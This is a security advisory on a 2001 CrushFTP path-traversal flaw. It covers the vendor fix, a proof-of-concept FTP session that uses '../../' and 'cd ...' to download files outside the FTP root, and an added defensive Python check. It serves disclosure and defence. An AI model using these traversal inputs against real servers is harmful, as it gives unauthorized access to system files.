CrushFTP Relative Path Vulnerability

Reported May 3, 2001, by Joe Testa.

VERSIONS AFFECTED

· CrushFTP Server 2.1.4 for Windows 2000, Windows NT, Windows Me, and Windows 9x

DESCRIPTION

A vulnerability exists that lets an attacker break out of the FTP root. For example, by connecting to a vulnerable host and issuing the change directory (CD) command, an attacker can reach the root directory of the system on which the FTP server is running. An attacker can also use relative paths to download files from outside the FTP root.

DEMONSTRATION

Joe Testa also provided the following proof-of-concept scenario:

The following is an illustration of the problem.  An ftp root of "c:\directory\directory" was used.

    >ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220-Welcome to CrushFTP!
    220 CrushFTP Server Ready.
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Username OK.  Need password.
    Password:
    230-Welcome!
    230 Password OK.  Connected.
    ftp> get ../../autoexec.bat
    200 PORT command successful. 127.0.0.1:1868
    150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
    226-Download File Size:419 bytes @ 0K/sec.
    226 Transfer complete.
    ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
    ftp> cd ...
    250 "/.../" CWD command successful.
    ftp> get command.com
    200 PORT command successful. 127.0.0.1:1870
    150 Opening ASCII mode data connection for command.com (93890 bytes).
    226-Download File Size:93890 bytes @ 92K/sec.
    226 Transfer complete.
    ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

VENDOR RESPONSE

The program author, Ben Spink, has released version 2.1.7, which is not subject to this vulnerability.
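
One way an FTP server can confine client-supplied paths to its root, shown as an added example (it is not code from CrushFTP or from the original report). The names resolve_in_root, PathEscape and is_allowed and the sample file names are assumptions for illustration; the check refuses both ".." sequences that climb above the root and dot-only components such as the "..." accepted in the session above.

```python
import ntpath  # Windows path semantics, importable on any host OS


class PathEscape(Exception):
    """A client-supplied path would leave the FTP root."""


def resolve_in_root(ftp_root, cwd, client_path):
    """Map an FTP path to a local Windows path confined to ftp_root.

    cwd is the session's virtual directory; "/" means the FTP root.
    """
    # Treat both separators alike; a leading separator means absolute.
    unified = client_path.replace("\\", "/")
    start = "/" if unified.startswith("/") else cwd
    parts = [p for p in start.split("/") if p]
    for comp in unified.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # would climb above the virtual root
                raise PathEscape(client_path)
            parts.pop()
        elif comp.strip(". ") == "" or ":" in comp:
            # Dot/space-only names ("...", ". .") and drive or stream
            # syntax are never legitimate file names: refuse them.
            raise PathEscape(client_path)
        else:
            parts.append(comp)
    root = ntpath.normpath(ftp_root)
    local = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: the final string must still sit under the root.
    if ntpath.commonpath([root, local]).lower() != root.lower():
        raise PathEscape(client_path)
    return local


def is_allowed(ftp_root, cwd, client_path):
    """True if the request resolves inside the root, False otherwise."""
    try:
        resolve_in_root(ftp_root, cwd, client_path)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    root = r"c:\directory\directory"  # FTP root used in the report
    for req in ("pub/readme.txt", "../../autoexec.bat", "..."):
        print(req, "->", "allowed" if is_allowed(root, "/", req) else "refused")
```

The same check belongs in the CWD handler before the session's directory is updated, so that a refused "cd" never becomes the starting point for later transfers.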

 

CREDIT

Discovered by Joe Testa.
